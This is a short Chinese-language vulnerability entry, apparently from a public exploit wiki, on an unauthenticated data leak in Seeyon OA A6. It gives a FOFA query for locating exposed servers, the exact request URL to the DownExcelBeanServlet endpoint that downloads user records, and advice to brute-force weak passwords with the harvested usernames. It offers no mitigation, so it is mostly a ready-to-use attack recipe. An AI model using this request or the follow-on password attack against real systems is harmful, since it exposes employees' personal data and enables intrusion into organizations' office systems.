致远OA A6 DownExcelBeanServlet 用户敏感信息泄露

漏洞描述

致远OA A6 存在某个未授权的接口导致任意访问者可下载OA中的用户信息

漏洞影响

致远OA A6

FOFA

title="致远A8+协同管理软件.A6"

漏洞复现

访问如下URL即可跳转下载用户信息文件

http://xxx.xxx.xxx.xxx/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0

可以再利用得到的用户名使用弱口令爆破进入OA进一步攻击

漏洞利用POC

Goby & POC

已上传 https://github.com/PeiQi0/PeiQi-WIKI-POC Goby & POC 目录中

Seeyon_OA_A6_DownExcelBeanServlet_User_information_leakage

Last updated

Was this helpful?